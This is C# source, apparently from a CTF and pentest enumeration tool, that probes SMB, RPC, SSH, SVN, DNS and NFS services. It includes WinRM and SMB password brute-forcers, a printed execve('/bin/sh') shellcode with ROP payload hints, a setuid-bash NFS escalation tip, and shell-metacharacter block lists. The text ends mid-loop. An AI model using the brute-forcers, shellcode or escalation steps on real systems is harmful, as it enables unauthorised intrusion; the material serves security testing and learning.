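        /// <summary>
        /// Runs "rpcclient -U ""%"" IP -c 'queryuser NAME'" for one enumdomusers line such as
        /// "user:[Guest] rid:[0x1f5]" and returns an indented summary of the interesting fields.
        /// </summary>
        /// <param name="ip">Target host, passed to rpcclient as-is.</param>
        /// <param name="user">One enumdomusers output line; the name between the first "[" and the following "]" is queried.</param>
        /// <returns>"-- NAME" followed by any non-empty Full Name / Home Drive / Comment / Description lines, trailing newline trimmed.</returns>
        private static string QueryEnumDomUser(string ip, string user)
        {
            // user:[Guest] rid:[0x1f5]
            // Bail out instead of throwing when the brackets are missing (IndexOf would return -1
            // and the old Remove/Substring calls threw on that).
            int open = user.IndexOf('[');
            int close = open < 0 ? -1 : user.IndexOf(']', open + 1);
            if (open < 0 || close < 0)
            {
                return "-- Unparsed user line: " + user.Trim();
            }
            string userName = user.Substring(open + 1, close - open - 1);
            string returnInfo = "-- " + userName + Environment.NewLine;

            // The name is spliced into rpcclient's -c string, and rpcclient treats ';' in -c as a
            // command separator. The value comes from the remote host, so refuse anything that could
            // close the quoted argument or smuggle in a second rpcclient command.
            if (userName.Length == 0 || userName.IndexOfAny(new[] { '"', ';', ' ', '\t', '\r', '\n' }) >= 0)
            {
                returnInfo += "--- Skipped queryuser: unexpected characters in user name" + Environment.NewLine;
                return returnInfo.Trim(Environment.NewLine.ToCharArray());
            }

            List<string> infoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"queryuser " + userName + "\"");

            foreach (string info in infoList)
            {
                // Output is one "key:value" per line; the first line without a ':' (the
                // "padding1[0..7]..." / "logon_hrs[0..21].." tail) ends the part worth reading.
                int colon = info.IndexOf(':');
                if (colon < 0)
                {
                    break;
                }
                string description = info.Substring(0, colon).Trim();
                string value = info.Substring(colon + 1).Trim();
                bool wanted = description == "Full Name" || description == "Home Drive" || description == "Comment" || description == "Description";
                if (wanted && value != "")
                {
                    returnInfo += "--- " + description + ": " + value + Environment.NewLine;
                }
            }
            return returnInfo.Trim(Environment.NewLine.ToCharArray());
        }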
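 /// <summary>
 /// Lists shares reachable with a null session ("smbclient -L TARGET --no-pass -g") and, for each
 /// one, tries an anonymous "ls" to see whether the share is browsable.
 /// </summary>
 /// <param name="target">Host name or IP handed to smbclient.</param>
 /// <returns>Indented report lines, or a single status line when the server refuses, drops or times out the session.</returns>
 private static string TestAnonymousAccess_Linux(string target)
 {
     if (!General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
     {
         return "- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red);
     }

     List<string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
     if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
     {
         return "- No Anonymous Access";
     }
     if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
     {
         return "- It connected, but instantly disconnected you";
     }
     if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
     {
         return "- Anonymous Access Allowed - But No Shares Found";
     }
     if (processResults.Count >= 1 && processResults[0].Contains("NT_STATUS_IO_TIMEOUT"))
     {
         return "- Timed out :(";
     }

     string smbClientItems = "";
     foreach (string item in processResults)
     {
         string trimmed = item.Trim();
         if (trimmed == "SMB1 disabled -- no workgroup available" || trimmed == "Anonymous login successful")
         {
             continue;
         }
         // -g output is "type|name|comment". Anything else (status text, error lines) used to hit
         // the generic catch below via IndexOutOfRange; report it in the output instead.
         string[] parts = item.Split('|');
         if (parts.Length < 3)
         {
             smbClientItems += "- " + trimmed + Environment.NewLine;
             continue;
         }
         string itemType = parts[0];
         string itemName = parts[1];
         string itemComment = parts[2];
         smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;

         // The share name comes from the remote host and is embedded in a quoted argument, so a
         // name that could break out of the quotes is listed but not probed further.
         if (itemName.Length == 0 || itemName.IndexOfAny(new[] { '"', '\\' }) >= 0)
         {
             smbClientItems += "-- Skipped ls check: unexpected characters in share name" + Environment.NewLine;
             continue;
         }
         try
         {
             // Quoted so that share names containing spaces stay one argument.
             List<string> subProcessResults = General.GetProcessOutput("smbclient", $"\"//{target}/{itemName}\" --no-pass -c \"ls\"");
             bool denied = subProcessResults.Any(x => x.Contains("NT_STATUS_ACCESS_DENIED") || x.Contains("NT_STATUS_OBJECT_NAME_NOT_FOUND"));
             if (subProcessResults.Count > 1 && !denied)
             {
                 smbClientItems += "-- " + $"{itemName} has ls perms - {subProcessResults.Count} items found! -> smbclient \"//{target}/{itemName}\" --no-pass".Pastel(Color.Orange) + Environment.NewLine;
             }
         }
         catch (Exception ex)
         {
             // NOTE(review): this only fires if GetProcessOutput itself throws; the parse errors
             // that used to land here are handled above.
             if (ex.Message.Contains("NT_STATUS_IO_TIMEOUT"))
             {
                 smbClientItems = "-- Timeout - Try later :(" + Environment.NewLine;
             }
             else
             {
                 Console.WriteLine($"TestAnonymousAccess_Linux - Error: {ex.Message} - Invalid item: {item} - Bug Reelix!");
             }
         }
     }
     return smbClientItems.Trim(Environment.NewLine.ToCharArray());
 }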
        // Get Auth Methods
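        /// <summary>
        /// Asks the SSH server which authentication methods it offers by connecting with
        /// PreferredAuthentications=none and reading the "(publickey,password,...)" list out of
        /// the resulting "Permission denied" line.
        /// </summary>
        /// <param name="ip">Host to connect to; required.</param>
        /// <param name="port">TCP port passed to ssh via -p.</param>
        /// <returns>The comma-separated method list, a "- ..." status line for closed/reset/timeout cases, or "" on unexpected output.</returns>
        public static string GetAuthMethods(string ip, int port)
        {
            if (string.IsNullOrEmpty(ip))
            {
                Console.WriteLine("Error in ssh.GetAuthMethods - Missing IP");
                return "";
            }
            // StrictHostKeyChecking=no is needed to get past key exchange unattended, but on its own
            // it also records the unverified host key in the operator's ~/.ssh/known_hosts. Pointing
            // UserKnownHostsFile at /dev/null keeps this recon probe from seeding trust for later
            // real connections to the same host.
            List<string> outputLines = General.GetProcessOutput("ssh", $"-o PreferredAuthentications=none -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=5 {ip} -p {port}");

            // kex_exchange_identification: read: Connection reset by peer
            if (outputLines.Count == 1 && outputLines[0].EndsWith("Connection refused"))
            {
                return "- Port is closed";
            }
            if (outputLines.Count == 1 && outputLines[0].Contains("no matching key exchange method found. Their offer:"))
            {
                return "- Weird Auth Method: " + outputLines[0];
            }
            if (outputLines.Count == 1 && outputLines[0].Trim() == "kex_exchange_identification: Connection closed by remote host")
            {
                return "- They have no auth methods to give you";
            }
            if (outputLines.Contains("kex_exchange_identification: read: Connection reset by peer"))
            {
                return "- Port is open, but connection reset with no info :(";
            }

            string deniedLine = outputLines.FirstOrDefault(x => x.Contains("Permission denied"));
            if (deniedLine == null)
            {
                if ((outputLines.Count == 1 || outputLines.Count == 2) && outputLines[0].Contains("Connection timed out"))
                {
                    return "Timed out :(";
                }
                Console.WriteLine("Error in ssh.GetAuthMethods - No Permission denied found");
                foreach (string line in outputLines)
                {
                    Console.WriteLine($"Debug: --> {line}");
                }
                return "";
            }

            // user@10.10.10.147: Permission denied (publickey,keyboard-interactive).
            // Guard the "(" lookup: the old Remove(0, IndexOf("(")) threw on a line without a list.
            int listStart = deniedLine.IndexOf('(');
            if (listStart < 0)
            {
                return "- Permission denied, but no auth method list: " + deniedLine.Trim();
            }
            return deniedLine.Substring(listStart).Replace("(", "").Replace(")", "");
        }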
        /// <summary>
        /// Runs one rpcclient command against ip. With <paramref name="signing"/> true a plain null
        /// session (-U ""%"") is used; with it false SMB signing is switched off (-S off) and the
        /// "anonymous" user is tried instead.
        /// </summary>
        /// <param name="ip">Target host.</param>
        /// <param name="command">Text placed verbatim inside -c "..."; callers must not pass untrusted input here.</param>
        /// <param name="signing">Selects between the two rpcclient argument forms described above.</param>
        /// <returns>rpcclient's output lines.</returns>
        private static List<string> RunCommand(string ip, string command, bool signing)
        {
            string arguments = signing
                ? $"-U \"\"%\"\" {ip} -c \"{command}\""
                : $"-S off -U \"anonymous\"%\"\" {ip} -c \"{command}\"";
            return General.GetProcessOutput("rpcclient", arguments);
        }
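        /// <summary>
        /// Runs "svn log svn://IP" and lists each revision with its author, comment and a ready-made
        /// "svn diff" command against the previous revision. Linux only.
        /// </summary>
        /// <param name="ip">Host the svn:// URL is built from.</param>
        /// <returns>One "- Commit rN by ..." line per revision, or "" when svn is missing or the OS is unsupported.</returns>
        public static string GetInfo(string ip)
        {
            string toReturn = "";

            if (General.GetOS() != General.OS.Linux)
            {
                Console.WriteLine("svn.GetInfo currently lacks Windows support. Bug Reelix.");
                return toReturn;
            }
            if (!General.IsInstalledOnLinux("svn"))
            {
                Console.WriteLine("svn is not installed - Skipping enumeration (You probably want to 'sudo apt install subversion')");
                return toReturn;
            }

            // svn info svn://ip - Anything super useful?
            // Revisions are separated by a dashed line; the lines of each block are joined with '|'
            // so the header ("rN | author | date | N lines") and the message end up in one string.
            string processOutput = string.Join("|", General.GetProcessOutput("svn", "log svn://" + ip));
            List<string> commitList = processOutput.Split(new[] { "------------------------------------------------------------------------" }, StringSplitOptions.None).ToList();
            commitList.RemoveAll(string.IsNullOrEmpty);
            foreach (string commit in commitList)
            {
                List<string> splitItems = commit.Split('|').ToList();
                splitItems.RemoveAll(string.IsNullOrEmpty);
                // 0 - Revision
                // 1 - Name
                // 2 - Date
                // 3 - Lines (?)
                // 4 - Comment
                // NOTE(review): a '|' inside the commit message shifts these columns - verify against real output.
                if (splitItems.Count < 5)
                {
                    toReturn += "- Conversion Error: unexpected svn log block: " + commit.Trim() + Environment.NewLine;
                    continue;
                }
                string commitRevision = splitItems[0].Trim();
                // "r5" diffs against r4 to show what that revision changed
                if (!int.TryParse(commitRevision.Replace("r", ""), out int revisionNumber))
                {
                    toReturn += "- Conversion Error: unexpected revision '" + commitRevision + "'" + Environment.NewLine;
                    continue;
                }
                int commitDiff = revisionNumber - 1;
                string commitName = splitItems[1].Trim();
                string commitComments = splitItems[4];
                toReturn += "- Commit " + commitRevision + " by " + commitName + " - " + commitComments + " ( svn diff -r" + commitDiff + " svn://" + ip + " )" + Environment.NewLine;
            }
            return toReturn.Trim(Environment.NewLine.ToCharArray());
        }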
        /// <summary>
        /// Dumps "rpcinfo -p TARGET" (the registered RPC programs) as "- " prefixed lines.
        /// </summary>
        /// <param name="target">Host passed to rpcinfo.</param>
        /// <param name="port">Unused by this method.</param>
        /// <returns>The prefixed rpcinfo output, or a red error line when rpcinfo is not installed.</returns>
        public static string GetInfo(string target, int port)
        {
            if (!General.IsInstalledOnLinux("rpcinfo"))
            {
                string missing = "- " + "Error: Cannot find rpcinfo - Unable to enumerate - install rpcbind".Pastel(Color.Red);
                return missing.Trim(Environment.NewLine.ToCharArray());
            }
            IEnumerable<string> prefixed = General.GetProcessOutput("rpcinfo", "-p " + target).Select(line => "- " + line);
            string report = string.Join(Environment.NewLine, prefixed);
            return report.Trim(Environment.NewLine.ToCharArray());
        }
        /// <summary>
        /// Asks the DNS server for its BIND version banner via the CHAOS-class TXT record
        /// "version.bind" (nslookup -type=txt -class=chaos version.bind IP).
        /// </summary>
        /// <param name="ip">DNS server to query.</param>
        /// <param name="port">Unused by this method; it is not passed to nslookup.</param>
        /// <returns>The nslookup output one "- " line each, or "- No Info Available" when the first line reports a timeout.</returns>
        public static string GetInfo(string ip, int port)
        {
            // https://raymii.org/s/tutorials/Get_DNS_server_version_and_hide_it_in_BIND.html
            List<string> outputLines = General.GetProcessOutput("nslookup", $"-type=txt -class=chaos version.bind {ip}");

            bool timedOut = outputLines.Count > 0 && outputLines[0].Trim() == "*** Request to UnKnown timed-out";
            string dnsInfo = timedOut
                ? "- No Info Available"
                : string.Concat(outputLines.Select(line => $"- {line}" + Environment.NewLine));
            return dnsInfo.Trim(Environment.NewLine.ToCharArray());
        }
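 /// <summary>
 /// Lists shares visible to a null session ("smbclient -L TARGET --no-pass -g") and then tries an
 /// anonymous "ls" on each one to see whether it is browsable.
 /// </summary>
 /// <param name="target">Host name or IP handed to smbclient.</param>
 /// <returns>Indented report lines, or one status line when the server refuses or drops the session.</returns>
 private static string TestAnonymousAccess_Linux(string target)
 {
     if (!General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
     {
         return "- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red);
     }

     List<string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
     if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
     {
         return "- No Anonymous Access";
     }
     if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
     {
         return "- It connected, but instantly disconnected you";
     }
     if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
     {
         return "- Anonymous Access Allowed - But No Shares Found";
     }

     string smbClientItems = "";
     foreach (string item in processResults)
     {
         string trimmed = item.Trim();
         if (trimmed.StartsWith("SMB1 disabled") || trimmed == "Anonymous login successful")
         {
             continue;
         }
         // -g output is "type|name|comment". Any other line (the "Anonymous login successful"
         // banner, error text) used to throw IndexOutOfRange on [1]/[2] and abort the whole
         // listing; report it and carry on instead.
         string[] parts = item.Split('|');
         if (parts.Length < 3)
         {
             smbClientItems += "- " + trimmed + Environment.NewLine;
             continue;
         }
         string itemType = parts[0];
         string itemName = parts[1];
         string itemComment = parts[2];
         smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;

         // The share name comes from the remote host and is embedded in a quoted argument, so a
         // name that could break out of the quotes is listed but not probed further.
         if (itemName.Length == 0 || itemName.IndexOfAny(new[] { '"', '\\' }) >= 0)
         {
             smbClientItems += "-- Skipped ls check: unexpected characters in share name" + Environment.NewLine;
             continue;
         }
         // Quoted so that share names containing spaces stay one argument.
         List<string> subProcessResults = General.GetProcessOutput("smbclient", $"\"//{target}/{itemName}\" --no-pass -c \"ls\"");
         // An access-denied / not-found reply is still more than one line, so it must be filtered
         // out explicitly or every share reads as browsable.
         bool denied = subProcessResults.Any(x => x.Contains("NT_STATUS_ACCESS_DENIED") || x.Contains("NT_STATUS_OBJECT_NAME_NOT_FOUND"));
         if (subProcessResults.Count > 1 && !denied)
         {
             smbClientItems += "-- " + $"{itemName} has ls perms! -> smbclient \"//{target}/{itemName}\" --no-pass".Pastel(Color.Orange) + Environment.NewLine;
         }
     }
     return smbClientItems.Trim(Environment.NewLine.ToCharArray());
 }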
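        /// <summary>
        /// Tries every user/password pair from the two wordlists against WinRM on ip by running
        /// Test-WSMan (Negotiate auth) from PowerShell. Must run from an administrative console
        /// because it edits WSMan:\localhost\Client\TrustedHosts for the duration of the run.
        /// </summary>
        /// <param name="ip">Target host.</param>
        /// <param name="userFile">File with one user name per line.</param>
        /// <param name="passFile">File with one password per line.</param>
        private static void WinRMBrute_Windows(string ip, string userFile, string passFile)
        {
            List<string> userList = File.ReadAllLines(userFile).ToList();
            List<string> passList = File.ReadAllLines(passFile).ToList();

            // Remember what TrustedHosts held so it can be restored at the end; the old code reset
            // it to '' and silently threw away whatever the operator had configured.
            List<string> previousLines = General.GetProcessOutput("powershell", @"(Get-Item WSMan:\localhost\Client\TrustedHosts).Value");
            string previousTrustedHosts = previousLines.Count == 1 ? previousLines[0].Trim() : "";

            // Perms
            List<string> permLines = General.GetProcessOutput("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + ip + " -Force");

            if (permLines.Count != 0 && permLines[0].Trim() == "Set-Item : Access is denied.")
            {
                Console.WriteLine("You need to run Reecon in an Administrative console for this functionality");
                return;
            }
            ConsoleColor originalColour = Console.ForegroundColor;
            foreach (string user in userList)
            {
                foreach (string pass in passList)
                {
                    Console.Write("Testing " + user + ":" + pass + " - ");
                    // Wordlist values are embedded as single-quoted PowerShell literals (see PsQuote).
                    // The old double-quoted form let a '$', '`' or '"' in a password be interpreted
                    // by PowerShell instead of being sent as part of the credential.
                    string script = "$creds = New-Object System.Management.Automation.PSCredential -ArgumentList (" + PsQuote(user) + ", (ConvertTo-SecureString " + PsQuote(pass) + " -AsPlainText -Force)); Test-WSMan -ComputerName " + ip + " -Credential $creds -Authentication Negotiate -erroraction SilentlyContinue";
                    List<string> processResult = General.GetProcessOutput("powershell", script);
                    // With -ErrorAction SilentlyContinue a rejected login prints nothing, so any output counts as a hit
                    if (processResult.Count != 0)
                    {
                        Console.ForegroundColor = ConsoleColor.Green;
                        Console.WriteLine("Success!");
                    }
                    else
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("Failed");
                    }
                    Console.ForegroundColor = originalColour;
                }
            }
            General.RunProcess("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + PsQuote(previousTrustedHosts) + " -Force");
        }

        /// <summary>
        /// Wraps value as a single-quoted PowerShell string literal for use inside a command line
        /// handed to powershell.exe: single quotes are doubled for PowerShell's parser, and double
        /// quotes (with any backslashes directly before them) are escaped for the Windows argument
        /// parser, which would otherwise treat them as argument delimiters.
        /// </summary>
        /// <param name="value">Raw text, e.g. a user name or password from a wordlist.</param>
        /// <returns>The quoted literal, e.g. it's -> 'it''s'.</returns>
        private static string PsQuote(string value)
        {
            string escaped = "";
            int pendingBackslashes = 0;
            foreach (char c in value)
            {
                if (c == '\\')
                {
                    pendingBackslashes++;
                    continue;
                }
                if (c == '"')
                {
                    // Backslashes before a quote are doubled and the quote itself escaped for the argv parser
                    escaped += new string('\\', pendingBackslashes * 2 + 1) + '"';
                }
                else
                {
                    escaped += new string('\\', pendingBackslashes) + (c == '\'' ? "''" : c.ToString());
                }
                pendingBackslashes = 0;
            }
            escaped += new string('\\', pendingBackslashes);
            return "'" + escaped + "'";
        }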
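        /// <summary>
        /// Runs a quick pwn triage on an ELF given as "./name": a cyclic-pattern crash to find the
        /// overwrite offset (x86 only, read back from dmesg), "ret;" / "pop rdi; ret;" gadgets and a
        /// "/bin/sh" string via ropper, the NX flag via rabin2, and system/puts references plus global
        /// .text symbols via objdump. Everything is printed to the console.
        /// </summary>
        /// <param name="fileName">Path to the binary, starting with "./". It is spliced into a bash pipeline, so shell metacharacters are rejected.</param>
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }
            // The name goes unquoted into "bash -c", so anything the shell would interpret is refused
            // rather than silently turning into a different command.
            if (fileName.IndexOfAny(new[] { ' ', '\t', '\'', '"', ';', '|', '&', '$', '`', '(', ')', '<', '>' }) >= 0)
            {
                Console.WriteLine("fileName contains shell metacharacters - rename the file first");
                return;
            }

            Architecture architecture = IDElf(fileName);

            if (architecture == Architecture.x86)
            {
                Console.WriteLine("Architecture: x86");
                ReportCyclicSegfault(fileName);
            }
            else if (architecture == Architecture.x64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                ReportRopperGadget(fileName, "ret;", "- ret; (Only function calls) --> ");
                ReportRopperGadget(fileName, "pop rdi; ret;", "- pop rdi; ret; (Can set values) --> ");

                // ropper --file sudo_pwn_file_here --string "/bin/sh"
                List<string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim().Replace("/bin/sh", "").Trim();
                        // Only a bare 10-character "0x........" address gets the p64() hint
                        if (pwnItem.Length == 10)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }
            }
            else
            {
                Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
            }

            if (General.IsInstalledOnLinux("rabin2"))
            {
                // fileName already starts with "./", so it is passed as-is (the old "./" + fileName produced "././x")
                List<string> rabin2Output = General.GetProcessOutput("rabin2", "-I " + fileName);
                foreach (string item in rabin2Output)
                {
                    string flag = item.Trim();
                    if (flag.StartsWith("nx") && item.Contains("false"))
                    {
                        Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                        if (architecture == Architecture.x64)
                        {
                            // 27-byte execve("/bin/sh") shellcode. The old string had a doubled backslash
                            // before x48, which printed "\\x48" and broke the shellcode when pasted.
                            Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Bug Reelix to fix his code!");
                        }
                    }
                    else if (flag.StartsWith("nx") && item.Contains("true"))
                    {
                        Console.WriteLine("- nx is enabled - No custom shellcode for you!");
                    }
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed - Skipping nx check");
            }

            if (General.IsInstalledOnLinux("objdump"))
            {
                List<string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                }

                // objdump -t ./file.elf | grep .text
                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = section name, " g " = global binding
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
            }
            else
            {
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }

        /// <summary>
        /// Feeds a 500-byte pwntools cyclic pattern to the x86 binary on stdin (5 second limit) and
        /// prints the faulting address dmesg logged for it, so the overwrite offset can be read off.
        /// </summary>
        /// <param name="fileName">Binary path starting with "./"; dmesg lines are matched on the name without that prefix.</param>
        private static void ReportCyclicSegfault(string fileName)
        {
            // You can get a segfault address of x86 programs by going
            // dmesg | tail -2 (Sometimes the last entry isn't for it)
            // dmesg | grep "ret2win32" | tail -1

            // pwn cyclic 500
            const string cyclic = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae";
            General.RunProcess("/bin/bash", " -c \"echo '" + cyclic + "' | " + fileName + "\"", 5);

            // NOTE(review): reading dmesg may need root on kernels with dmesg_restrict; then nothing matches and nothing is printed.
            List<string> dmesgOutput = General.GetProcessOutput("dmesg", "");
            string baseName = fileName.TrimStart("./".ToCharArray());
            foreach (string item in dmesgOutput)
            {
                //  segfault at 6161616c ip 000000006161616c x
                if (item.Contains(baseName) && item.Contains("segfault at "))
                {
                    Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9));
                }
            }
        }

        /// <summary>
        /// Runs "ropper --search GADGET" on the binary and prints each hit under label, adding a
        /// pwntools "payload += p64(...)" hint when the address has the 18-character 0x... form.
        /// </summary>
        /// <param name="fileName">Binary path handed to ropper --file.</param>
        /// <param name="gadget">Gadget text, e.g. "ret;" or "pop rdi; ret;"; ropper prints it as "ADDR: GADGET".</param>
        /// <param name="label">Prefix for each printed line.</param>
        private static void ReportRopperGadget(string fileName, string gadget, string label)
        {
            List<string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"{gadget}\"");
            foreach (string item in ropperOutput)
            {
                if (item.StartsWith("[INFO]") || item.StartsWith("[LOAD]"))
                {
                    continue;
                }
                string pwnItem = item.Trim().Replace(": " + gadget, "");
                if (pwnItem.Length == 18) // x64
                {
                    // 0x16 - x64 address
                    pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                }
                else
                {
                    Console.WriteLine("Not 18 - " + pwnItem.Length);
                }
                Console.WriteLine(label + pwnItem);
            }
        }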
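        /// <summary>
        /// Lists NFS exports on target with "showmount -e" (System32\showmount.exe on Windows, showmount
        /// on Linux) and, on Linux, highlights world-readable exports with a ready-made mount command.
        /// </summary>
        /// <param name="target">NFS server.</param>
        /// <param name="port">Unused by this method.</param>
        /// <returns>Indented export list, a red error line when showmount is missing, or "" when there is nothing to report or the OS is unsupported.</returns>
        public static string GetInfo(string target, int port)
        {
            // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse
            string fileList = "";

            if (General.GetOS() == General.OS.Windows)
            {
                if (!File.Exists(@"C:\Windows\System32\showmount.exe"))
                {
                    return "- showmount does not exist - Bug Reelix to update this section for more compatibility";
                }
                List<string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
                // The first line is presumably showmount's heading; only what follows it is listed
                if (outputLines.Count > 1)
                {
                    outputLines.RemoveAt(0);
                    fileList = "- Files:" + Environment.NewLine;
                    foreach (string line in outputLines)
                    {
                        fileList += "-- " + line + Environment.NewLine;
                    }
                    fileList = fileList.Trim(Environment.NewLine.ToCharArray());
                    fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
                }
                return fileList.Trim(Environment.NewLine.ToCharArray());
            }

            if (General.GetOS() == General.OS.Linux)
            {
                if (!General.IsInstalledOnLinux("showmount")) // "/sbin/showmount" OR "/usr/sbin/showmount"
                {
                    return "- Error - showmount is not installed - Unable to enumerate! Run: sudo apt install nfs-common".Pastel(Color.Red);
                }
                List<string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
                foreach (string line in showmountOutput)
                {
                    // https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
                    // The "copy bash, +s it" hint below only pays off when the export does not root-squash - confirm per target.
                    if (line.Trim().EndsWith("*"))
                    {
                        // NFS V1 - export open to any client
                        fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                        // Interpolated ($) so the real target lands in the hint; this line used to print "{target}" literally.
                        fileList += "-- NFSV1 -> " + $"sudo mount -t nfs {target}:/mountNameHere /tmp/mount/ -nolock".Pastel(Color.Orange) + Environment.NewLine;
                        fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
                    }
                    else if (line.Contains(" (everyone)"))
                    {
                        // NFS V2
                        fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                        fileList += "-- NFSV2 -> " + $"sudo mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
                        fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
                    }
                    else
                    {
                        fileList += "- " + line + Environment.NewLine;
                    }
                }
                return fileList.Trim(Environment.NewLine.ToCharArray());
            }

            Console.WriteLine("Error - OS Not Supported - Bug Reelix");
            return "";
        }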
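        /// <summary>
        /// Tries every user/password pair from two wordlists against SMB on the target with
        /// "smbclient -L ... -U user%pass" and stops at the first pair the server does not reject.
        /// Usage: reecon -smb-brute IP Userfile Passfile. Linux only.
        /// </summary>
        /// <param name="args">Full argument vector: [0] = the -smb-brute switch, [1] = IP, [2] = user file, [3] = password file.</param>
        public static void SMBBrute(string[] args)
        {
            // TODO: This still shows "Success" if the username doesn't exist
            if (!RuntimeInformation.IsOSPlatform(OSPlatform.Linux))
            {
                Console.WriteLine("SMB Brute only currently works in Linux - Heh :p");
                return;
            }
            if (args.Length != 4)
            {
                Console.WriteLine("SMB Brute Usage: reecon -smb-brute IP Userfile Passfile");
                return;
            }
            string ip       = args[1];
            string userFile = args[2];
            string passFile = args[3];

            if (!File.Exists(userFile))
            {
                Console.WriteLine("Unable to find UserFile: " + userFile);
                return;
            }
            if (!File.Exists(passFile))
            {
                Console.WriteLine("Unable to find Passfile: " + passFile);
                return;
            }
            List<string> userList = File.ReadAllLines(userFile).ToList();
            List<string> passList = File.ReadAllLines(passFile).ToList();

            foreach (string user in userList)
            {
                foreach (string pass in passList)
                {
                    // user%pass is passed as one quoted argument so that spaces in a password survive.
                    // A '"' inside either value would end the quoted argument early, so such pairs are
                    // skipped rather than sent mangled. (A '%' in the user name still confuses smbclient's split.)
                    if (user.Contains("\"") || pass.Contains("\""))
                    {
                        Console.WriteLine(user + ":" + pass + " - Skipped (double quote in credential)");
                        continue;
                    }
                    List<string> outputResult = General.GetProcessOutput("smbclient", @"-L \\\\" + ip + " -U \"" + user + "%" + pass + "\"");
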